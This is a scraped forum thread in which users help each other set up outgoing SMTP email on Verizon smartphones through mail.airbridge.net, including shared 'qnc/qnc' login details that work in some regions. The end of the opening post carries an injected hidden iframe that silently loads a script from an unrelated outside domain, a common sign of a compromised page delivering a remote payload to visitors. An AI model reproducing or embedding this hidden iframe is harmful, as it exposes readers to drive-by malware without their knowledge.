+ Reply to Thread

smtp server setting

I was playing around with qnc today on one of my phones (preparing for 7135 arrival tomorrow) and realized my ISP won't allow smtp mail from verizon IP (199.x.x.x).. does Verizon have a smtp to use? (will mail.airbridge.net work)?? My ISP also doesn't support sending with authentication.

Thanks for any suggestions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: smtp server setting

Originally posted by jameskk
    I was playing around with qnc today on one of my phones (preparing for 7135 arrival tomorrow) and realized my ISP won't allow smtp mail from verizon IP (199.x.x.x).. does Verizon have a smtp to use? (will mail.airbridge.net work)?? My ISP also doesn't support sending with authentication.
    Yes, the Airbridge SMTP server will work, however you need to call Verizon and have it activated. Good luck!

you don't have to call verizon to use the smtp server, mail.airbridge.net, for sending mail.

Originally posted by dgelfuso
    you don't have to call verizon to use the smtp server, mail.airbridge.net, for sending mail.
    Depends on the market actually (I think it is based on the IP address of your phone when connected). in some areas, it requires authentication. someplaces you can use qnc/qnc as the user name/password for authentication, and some you can't. Here in Maryland, no authentication is required.

Alan

I had to for mine. It wouldn't work until I called Verizon had them create an Airbridge account for me. YMMV...

Wow! I haven't been able to send outgoing email on my 7135 and didn't feel like going through the hassle of calling up Verizon and setting up an airbridge account. But after reading here that for some people all you had to do was type it into the settings, I tried and it worked! I am soooooo happy! Finally I can send email again!

Alan, when you said, "Depends on the market actually (I think it is based on the IP address of your phone when connected). in some areas, it requires authentication. someplaces you can use qnc/qnc as the user name/password for authentication, and some you can't.", did you mean that even though the airbridge works for me here at home in the Twin Cities, if I travel it it might not work (and I'd need Verizon to set up an account) or did you mean that it it works without the account for me here in my home area, then it will work just fine in any digital area when I travel?

Thanks so much you guys!!!!!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Wow! I haven't been able to send outgoing email on my 7135 and didn't feel like going through the hassle of calling up Verizon and setting up an airbridge account. But after reading here that for some people all you had to do was type it into the settings, I tried and it worked! I am soooooo happy! Finally I can send email again!

Alan, when you said, "Depends on the market actually (I think it is based on the IP address of your phone when connected). in some areas, it requires authentication. someplaces you can use qnc/qnc as the user name/password for authentication, and some you can't.", did you mean that even though the airbridge works for me here at home in the Twin Cities, if I travel it it might not work (and I'd need Verizon to set up an account) or did you mean that it it works without the account for me here in my home area, then it will work just fine in any digital area when I travel?

Thanks so much you guys!!!!!
    I am not sure what will happen if you travel. I have not been outside of my area since getting the 7135 so it hasn't been an issue. If I do run into a problem, I have my own mail server, so I can set up to use it. I haven't done this yet since my server doesn't support ESMTP authentication, and I don't want to set it up as an open relay to any Verizon IP address, but if I have a problem on the road, I can VNC into the server and set it up in a few minutes. I also have a WAP access page, so I could just log in with Blazer and send emails that way.

Alan

It sounds like people with EN might need to have to call and have an airbridge account set up where those of us with just qnc can just use mail.airbridge.net. Does that sound right?
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Originally posted by Beryl
    It sounds like people with EN might need to have to call and have an airbridge account set up where those of us with just qnc can just use mail.airbridge.net. Does that sound right?
    Nope. I can use it with EN or QNC without any authentication here. It also continues to work if I use qnc/qnc as user name/password. It definitly seems to be location based.

If their mail server is programmed anything like mine, it looks like someone didn't enter all of the Verizon IP subnets as trusted domains.

Alan

Originally posted by Markito
    if I travel it it might not work (and I'd need Verizon to set up an account) or did you mean that it it works without the account for me here in my home area, then it will work just fine in any digital area when I travel?
    I'm still using my 6035 and am travelling with it. As long as there is a digital signal I can send and receive e-mail with airbridge.net without any problems.

Dagi

Yay!!!!! Today has been a great day!
    ~'kito
    pdaPhoneHome Moderator

Thanks for the info Dagi & Alan!
    ~'kito
    pdaPhoneHome Moderator

Thanks for the tip guys! I hadn't been able to send email since I upgraded to EN, and Verizon was refusing to give me an airbridge account because "that phone is not yet supported." I just tried it using qnc/qnc to authenticate and it worked!
    Sorry, but I no longer make 7135 headset adapters.

Originally posted by coolcat
    Thanks for the tip guys! I hadn't been able to send email since I upgraded to EN, and Verizon was refusing to give me an airbridge account because "that phone is not yet supported." I just tried it using qnc/qnc to authenticate and it worked!
    I actually got that idea from a thread here last month where people were talking about problems sending email. Sorry y'all missed it then.

Alan

Anybody know how to set up Mobile Mail to send mail via QNC in the Southern California area?

My land line Verizon account settings keep giving me an "authentication required to send mail" error message. I tried using mail.airbridge.net and qnc/qnc but I got an error message about the user name.

Originally posted by jazmaan
    Anybody know how to set up Mobile Mail to send mail via QNC in the Southern California area?

My land line Verizon account settings keep giving me an "authentication required to send mail" error message. I tried using mail.airbridge.net and qnc/qnc but I got an error message about the user name.
    Is the problem just with Mobile Mail? If not, then you may need to call Verizon to setup an actual Airbridge account for you.

To send mail with an smtp server, you typically need to be logged on to the ISP. Using your Verizon dial up is not the same as your wireless qnc connection. mail.airbridge.net will work from you phone when you connect with qnc and you do not need to set up an account. Your verizon landline acocunt should have it's own smtp server.

To send mail with an smtp server, you typically need to be logged on to the ISP. Using your Verizon dial up is not the same as your wireless qnc connection. mail.airbridge.net will work from you phone when you connect with qnc and you do not need to set up an account. Your verizon landline acocunt should have it's own smtp server.
    I don't have a Verizon landline account, but did need to specifically setup an Airbridge account with Verizon. Simply entering mail.airbridge.net as my SMTP server didn't work for me and others, but I guess it has for some. So it may depend on your IP address and/or specific location.

Ok, after going through about 3 levels of clueless Verizon tech drones I finally got my FREE airbridge account. The lower level drones couldn't wrap their minds around the concept of "No, I do NOT wish to pay for Mobile Net, I just want a FREE e-mail account to use with my Smartphone!"